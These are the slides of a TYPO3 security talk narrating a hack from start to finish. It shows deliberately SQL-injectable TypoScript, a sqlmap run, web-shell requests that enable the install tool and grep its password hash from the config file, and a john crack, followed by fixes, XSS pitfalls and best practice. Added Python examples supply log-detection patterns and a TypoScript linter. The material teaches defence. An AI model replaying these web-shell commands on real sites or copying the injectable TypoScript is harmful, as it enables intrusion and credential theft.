security forensics - t3dd15
Inspiring people to share
TYPO3 Developer Days 2015
Security Forensics
Helmut Hummel <[email protected]>
17.07.2015
#CertiFUNcation - Brühl 2015
Secure TYPO3
#CertiFUNcation 2015
Agenda
• Diary of a Hack
• Pitfalls
• Best Practice
Diary of a Hack
Day 1 - Implementing a feature
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where.wrap = header like '%|%'
  select.where.data = GP:search
}
Day 2 - Testing the feature
'BE/debug' => '1'
'FE/debug' => '1'
'SYS/devIPmask' => '*'
'SYS/displayErrors' => '1'
'SYS/sqlDebug' => '1'
'SYS/exceptionalErrors' => '28674'
'DB/username' => 'root'
Day 3 - Distraction
Day 4 - Attraction
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Day 5 - Exploitation
Disclaimer
Don’t do this at home!
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'
GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
http://security.dev/typo3/sysext/install/Start/Install.php
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password         (dummy)
guesses: 1  time: 0:00:00:01 DONE (Thu Jun  4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing
Day 5 - Discovery
Discovery
• Take site offline!
• seriously
• I mean it
Day 6 - Analysis
Analysis
• Make a backup of current state (files, DB)
• Search all logs for "suspicious" entries
• Try to reproduce assumed entry points
• If in doubt: get help
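One way to do the "search all logs for suspicious entries" step against the traces this diary would leave (sqlmap probing colPos, the dropped PHP file taking a cmd= parameter, the install tool being enabled and opened), as an added example that is not part of the slides; it assumes combined-format access logs and the constructed sample lines embedded below.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Traces the hack diary would leave in an access log: sqlmap probing the colPos
# parameter, the dropped PHP file taking a cmd= parameter, the install tool being
# enabled and then opened. These are triage leads, not verdicts.
SIGNATURES = {
    "sqlmap user agent": re.compile(r"\bsqlmap/", re.I),
    "SQL injection probe": re.compile(r"'\s*(?:and|or)\s+\d+=\d+|union\s+(?:all\s+)?select|sleep\(\d+\)", re.I),
    "web shell cmd= parameter": re.compile(r"\.php\?cmd=", re.I),
    "install tool enable file": re.compile(r"ENABLE_INSTALL_TOOL"),
    "install tool access": re.compile(r"/typo3/sysext/install/"),
}
# Combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                      r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def triage(lines):
    """Return (findings, ip -> number of suspicious lines); a finding is (ip, ts, tag, request)."""
    findings, per_ip = [], Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line; worth a look by hand but not scored here
        # Decode %xx so "touch%20typo3conf/ENABLE_INSTALL_TOOL" and quoted SQL are visible.
        haystack = unquote(m["req"]) + " " + m["ua"]
        tags = [tag for tag, pat in SIGNATURES.items() if pat.search(haystack)]
        findings.extend((m["ip"], m["ts"], tag, m["req"]) for tag in tags)
        if tags:
            per_ip[m["ip"]] += 1
    return findings, per_ip

# Constructed access-log lines modelled on the slides' requests (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/2015:10:41:02 +0200] "GET /insecurity/?colPos=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jun/2015:10:41:05 +0200] "GET /insecurity/?colPos=0%27%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [04/Jun/2015:10:41:06 +0200] "GET /insecurity/?colPos=0%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [04/Jun/2015:10:52:30 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jun/2015:10:52:41 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2015:10:55:00 +0200] "GET /index.php?id=1 HTTP/1.1" 200 7710 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, ts, tag, req in triage(SAMPLE_LOG.splitlines())[0]:
        print(f"{ts} {ip} {tag}: {req}")
```

The per-IP count gives the order in which to pull the full request history for the analysis backup; a hit on the install tool path alone is only suspicious when no administrator was working at that time.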
Day 7 - Fix
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where = colPos=###colPos###
  select.markers {
    colPos.data = GP:colPos
  }
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    search.data = GP:search
    search.wrap = %|%
  }
}
Fix
• Close security issue in Code / Extension / Core
• Restore from backup
• Or if you really know what you are doing: clean up installation
• Go online again
• Plan improvements (education, monitoring, …)
Further Pitfalls
Types of Security Threats
• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
TypoScript
page.10 = TEXT
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1
page.10 = TEXT
# title can contain: {DB:be_users:1:password}
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1
page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10 = TEXT
# title can contain HTML
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1
page.10 = TEXT
# Avoid dataWrap or insertData if possible
# layout field might not be safe
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1
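An added TypoScript lint (not the deck's or TYPO3's own code) that flags both pitfalls shown in the diary and in this TypoScript section: GP: input placed straight into select.where instead of select.markers, and TEXT objects whose insertData or dataWrap output lacks htmlSpecialChars or substitutes {field:...} and {DB:...} references that htmlSpecialChars does not cover. The flatten() parser and the sample snippets are assumptions covering only the key = value and key { } syntax the slides use.

```python
import re

def flatten(ts):
    """Flatten nested TypoScript (key = value, key { ... }, # comments) to dotted paths."""
    stack, out = [], {}
    for raw in ts.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line == "}":
            stack.pop()
        elif line.endswith("{"):
            stack.append(line[:-1].strip())
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            out[".".join(stack + [key])] = value
    return out

def lint(ts):
    """Return (object, message) findings: GP: input in select.where, unescaped field output."""
    conf, findings = flatten(ts), []
    for path, value in conf.items():
        if value == "CONTENT" and conf.get(path + ".select.where.data", "").startswith("GP:"):
            findings.append((path, "select.where.data takes GP: input unescaped; use select.markers"))
        if value == "TEXT":
            insert = conf.get(path + ".insertData") == "1"
            dynamic = insert or path + ".dataWrap" in conf
            if dynamic and conf.get(path + ".htmlSpecialChars") != "1":
                findings.append((path, "field rendered without htmlSpecialChars = 1"))
            wrap = conf.get(path + ".dataWrap", "") + (conf.get(path + ".wrap", "") if insert else "")
            # {field:...} / {DB:...} substituted into the wrap bypass htmlSpecialChars entirely.
            for ref in re.findall(r"\{(\w+:[^}]*)\}", wrap):
                findings.append((path, "{" + ref + "} in the wrap is substituted unescaped"))
    return findings

# Constructed samples mirroring the slides (not the deck's own files).
VULNERABLE = """
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}
page.10 = TEXT
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
"""
FIXED = """
lib.sqliSimple = CONTENT
lib.sqliSimple.select.where = colPos=###colPos###
lib.sqliSimple.select.markers.colPos.data = GP:colPos
page.10 = TEXT
page.10.htmlSpecialChars = 1
"""
```

Run lint() over a site's TypoScript exports; the {field:layout} finding is the "layout field might not be safe" caveat from the last slide and remains even after htmlSpecialChars = 1 is added.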
Fluid
Extbase
XSS even when using Fluid
• Flash Messages
• HTML Context
• Custom View Helpers
Best Practice
Best Practice
• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
Questions?
Secure TYPO3 - Diary of a Hack
Resources
• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/